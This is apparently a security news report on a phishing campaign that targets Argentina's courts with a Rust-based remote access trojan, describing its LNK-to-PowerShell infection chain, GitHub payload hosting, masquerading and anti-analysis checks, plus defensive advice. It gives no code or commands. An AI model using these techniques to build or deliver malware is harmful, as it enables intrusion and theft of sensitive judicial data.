Argentina’s judicial system is under a sophisticated cyberattack, with threat actors now abusing legitimate court documents and GitHub repositories to deploy a potent Remote Access Trojan (RAT) known as COVERT RAT. This ongoing campaign, dubbed Operation Covert Access, is specifically targeting federal courts, legal professionals, government justice agencies, and academic institutions within the country.
The attackers are leveraging spear-phishing emails that masquerade as official communications from Argentine federal courts. These emails contain seemingly legitimate documents related to preventive detention reviews, a tactic designed to exploit the trust inherent in legal processes and bypass typical user caution. The ultimate goal is to gain persistent control over infected systems, granting attackers access to sensitive judicial data and infrastructure.
Operation Covert Access: A Multi-Layered Threat to Judicial Targets
Analysis by Point Wild, building on foundational research from Seqrite, has revealed the intricate nature of this attack. The campaign is not a simple, one-step intrusion but a meticulously crafted, multi-stage infiltration designed to remain undetected within institutional networks for an extended period. The COVERT RAT, built in Rust, offers attackers extensive control over compromised machines, enabling a range of malicious activities.
The implications of COVERT RAT’s capabilities are significant. Once operational, the malware establishes a connection to a command-and-control (C2) server, allowing attackers to issue encoded instructions. These instructions can facilitate everything from the exfiltration of sensitive files to the deployment of ransomware. The RAT’s modular design further enhances its threat, supporting credential harvesting, privilege escalation, encrypted file operations, and ensuring persistent re-access to victim systems.
A particularly concerning feature highlighted by researchers is the malware’s built-in cleanup functionality. This capability allows attackers to erase all traces of their presence upon completion of their objectives, severely complicating post-incident forensics and attribution efforts.
The Technical Execution: From Phishing to Persistent Access
The infection chain begins with a spear-phishing email delivering a ZIP archive. This archive contains three key components: a Windows shortcut (LNK) file designed to appear as a PDF, a batch loader script, and a convincing PDF decoy document that mimics genuine court rulings. When the user clicks the LNK file, a malicious script executes silently in the background, while the decoy PDF is displayed to maintain the illusion of legitimacy.
The shortcut file, often named something like “juicio-grunt-posting.pdf.lnk” and adorned with a PDF icon, triggers PowerShell in a hidden mode with the execution policy disabled. This immediately activates the batch loader script, identified as “health-check.bat.” According to security reports, this script then reaches out to a GitHub repository to download the primary RAT payload.
The use of GitHub as a delivery channel is a strategic choice by the attackers. Traffic directed to GitHub is less likely to raise immediate red flags at the network level, contributing to the stealthy nature of the operation. Once downloaded, the payload is executed via PowerShell’s `Start-Process` command and is masqueraded as “msedge_proxy.exe,” strategically placed within Microsoft Edge’s user data folder to blend in with legitimate system processes.
Before establishing a connection to its C2 server, the malware performs a series of environment checks. It queries system manufacturers using WMIC, scans the tasklist for reverse engineering tools like Wireshark, OllyDbg, and x64dbg, and inspects registry paths associated with virtualization software such as VMware, VirtualBox, and Hyper-V. It also scrutinizes the Process Environment Block (PEB) for active debuggers and employs timing-based analysis using `QueryPerformanceFrequency` to detect emulated environments. Only after passing all these checks does the RAT proceed to communicate with its C2 server and await further commands from the operators.
Recommendations for Enhanced Security
Given the targeted nature and sophisticated techniques employed in this campaign, security teams and individuals operating within judicial and legal environments are strongly advised to implement robust security measures. These include maintaining up-to-date antivirus software with real-time protection actively enabled and exercising extreme caution with email attachments, particularly from unverified senders or in compressed archive formats.
Users should refrain from clicking on suspicious links or downloading files from unofficial sources. Regular monitoring of running processes in Task Manager is also recommended to identify and investigate any unfamiliar entries, such as the deceptive “msedge_proxy.exe.” Furthermore, avoiding the installation of cracked or pirated software is crucial, as these are common vectors for secondary infections.
The ongoing investigation into Operation Covert Access and the specific capabilities of COVERT RAT aim to provide a clearer picture of the threat landscape impacting Argentina’s judicial sector. The findings underscore the critical need for constant vigilance and adaptive security strategies to counter evolving cyber threats targeting sensitive governmental and legal infrastructure.